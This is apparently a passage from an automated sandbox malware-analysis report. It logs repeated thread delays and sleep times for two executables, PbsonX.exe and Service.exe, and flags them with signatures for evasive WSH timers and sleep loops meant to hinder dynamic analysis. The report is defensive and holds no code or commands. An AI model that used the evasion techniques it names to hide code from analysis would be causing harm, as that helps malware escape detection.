Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 592772
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 592249
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 592079
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599891
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599766
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599640
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599531
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599420
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599312
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599203
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 599094
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598969
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598859
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598750
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598641
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598531
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598417
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598295
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598134
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 598025
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597797
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597688
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597577
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597469
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597344
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597234
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597125
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 597016
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596907
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596782
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596657
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596532
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596422
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596313
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596188
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 596063
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595938
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595813
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595703
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595594
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595385
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 595065
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594875
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594766
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594655
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594546
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594391
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594258
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 594016
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593844
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593625
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593507
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593390
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593281
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593150
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 593047
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 592922
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 592809
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 592295
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Thread delayed: delay time: 592139
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 599867
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 599750
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 599630
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 599500
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 599391
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 599266
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 599156
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 598971
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 598840
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 598469
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 598344
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 598235
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 598110
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 597985
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 597860
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 597735
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 597610
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 597485
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 597360
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 597235
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 597110
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 596985
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 596860
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 596735
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 596610
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 596485
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 596360
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 596235
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 596094
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 595953
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 595840
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 595733
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 595625
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 595516
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 595352
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 595235
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 595110
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 594976
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 594844
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 594657
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 594500
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 594372
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 594243
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 594114
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 593985
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 593844
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 593734
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 593020
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 592813
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 592453
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 592125
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 591984
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 591855
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 591735
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 591625
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 591500
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 591357
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 591250
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 591140
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 599867
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 599749
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 599630
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 599500
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 599390
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 599280
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 599171
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 598970
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 598839
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 598468
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 598358
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 598249
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 598140
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 598031
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 597921
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 597807
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 597702
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 597593
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 597484
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 597374
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 597265
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 597155
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 597047
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 596937
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 596828
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 596718
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 596609
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 596500
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 596390
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 596281
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 596129
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 595984
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 595855
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 595749
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 595640
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 595530
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 595396
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 595265
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 595145
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 594984
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 594844
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 594656
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 594500
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 594372
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 594242
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 594113
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 593984
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 593859
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 593747
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 593019
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 592609
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 592156
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 591984
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 591855
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 591734
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 591625
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 591499
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 591357
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 591249
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 599874
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 599766
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 599646
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 599536
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 599407
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 599282
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 599157
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 598981
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 598858
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 598485
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 598360
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 598235
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 598110
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 597985
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 597860
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 597735
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 597610
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 597485
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 597360
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 597235
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 597110
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 596985
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 596860
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 596735
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 596610
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 596485
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 596360
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Window / User API: threadDelayed 2424 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Window / User API: threadDelayed 7418 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Window / User API: threadDelayed 7500 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Window / User API: threadDelayed 2307 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Window / User API: threadDelayed 8527
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Window / User API: threadDelayed 1274
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Window / User API: threadDelayed 6938
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Window / User API: threadDelayed 2827
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Window / User API: threadDelayed 6422
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Window / User API: threadDelayed 3357
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Window / User API: threadDelayed 7054
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Window / User API: threadDelayed 2730
Source: C:\Users\user\AppData\Roaming\Service.exe Window / User API: threadDelayed 6984
Source: C:\Users\user\AppData\Roaming\Service.exe Window / User API: threadDelayed 2740
Source: C:\Users\user\AppData\Roaming\Service.exe Window / User API: threadDelayed 8291
Source: C:\Users\user\AppData\Roaming\Service.exe Window / User API: threadDelayed 1496
Source: C:\Users\user\AppData\Roaming\Service.exe Window / User API: threadDelayed 8739
Source: C:\Users\user\AppData\Roaming\Service.exe Window / User API: threadDelayed 1015
Source: C:\Users\user\AppData\Roaming\Service.exe Window / User API: threadDelayed 8698
Source: C:\Users\user\AppData\Roaming\Service.exe Window / User API: threadDelayed 1053
Source: C:\Users\user\AppData\Roaming\Service.exe Window / User API: threadDelayed 8414
Source: C:\Users\user\AppData\Roaming\Service.exe Window / User API: threadDelayed 1359
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Window / User API: threadDelayed 9458
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Window / User API: threadDelayed 9356
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Window / User API: threadDelayed 392
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Window / User API: threadDelayed 9102
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Window / User API: threadDelayed 616
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Window / User API: threadDelayed 9584
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Window / User API: threadDelayed 9521
Source: C:\Users\user\AppData\Roaming\Service.exe Window / User API: threadDelayed 9463
Source: C:\Users\user\AppData\Roaming\Service.exe Window / User API: threadDelayed 6635
Source: C:\Users\user\AppData\Roaming\Service.exe Window / User API: threadDelayed 3162
Source: C:\Users\user\AppData\Roaming\Service.exe Window / User API: threadDelayed 9422
Source: C:\Users\user\AppData\Roaming\Service.exe Window / User API: threadDelayed 399
Source: C:\Users\user\AppData\Roaming\Service.exe Window / User API: threadDelayed 9453
Source: C:\Users\user\AppData\Roaming\Service.exe Window / User API: threadDelayed 6585
Source: C:\Users\user\AppData\Roaming\Service.exe Window / User API: threadDelayed 3227
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 5408 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7104 Thread sleep count: 34 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7104 Thread sleep time: -31359464925306218s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7104 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7108 Thread sleep count: 2424 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7104 Thread sleep time: -599874s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7108 Thread sleep count: 7418 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7104 Thread sleep time: -599765s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7104 Thread sleep time: -599654s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7104 Thread sleep time: -599544s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7104 Thread sleep time: -599435s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7104 Thread sleep time: -599327s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7104 Thread sleep time: -599219s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7104 Thread sleep time: -599109s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7104 Thread sleep time: -599000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7104 Thread sleep time: -598891s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7104 Thread sleep time: -598781s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7104 Thread sleep time: -598672s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7104 Thread sleep time: -598562s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7104 Thread sleep time: -598453s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7104 Thread sleep time: -598344s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7104 Thread sleep time: -598219s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7104 Thread sleep time: -598109s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7104 Thread sleep time: -598000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7104 Thread sleep time: -597891s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7104 Thread sleep time: -597781s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7104 Thread sleep time: -597672s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7104 Thread sleep time: -597562s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7104 Thread sleep time: -597453s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7104 Thread sleep time: -597344s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7104 Thread sleep time: -597217s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7104 Thread sleep time: -597109s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7104 Thread sleep time: -596931s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7104 Thread sleep time: -596767s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7104 Thread sleep time: -596600s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7104 Thread sleep time: -596483s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7104 Thread sleep time: -596373s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7104 Thread sleep time: -596266s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7104 Thread sleep time: -596156s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7104 Thread sleep time: -596047s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7104 Thread sleep time: -595937s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7104 Thread sleep time: -595828s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7104 Thread sleep time: -595718s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7104 Thread sleep time: -595609s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7104 Thread sleep time: -595500s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7104 Thread sleep time: -595390s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7104 Thread sleep time: -595281s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7104 Thread sleep time: -595172s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7104 Thread sleep time: -595047s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7104 Thread sleep time: -594937s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7104 Thread sleep time: -594828s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7104 Thread sleep time: -594718s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7104 Thread sleep time: -594609s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7104 Thread sleep time: -594500s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7104 Thread sleep time: -594391s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 7104 Thread sleep time: -594266s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 4476 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep count: 37 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep time: -34126476536362649s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6920 Thread sleep count: 7500 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep time: -599874s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep time: -599765s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep time: -599656s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 6920 Thread sleep count: 2307 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep time: -599546s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep time: -599437s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe TID: 932 Thread sleep time: -599326s >= -30000s Jump to behavior
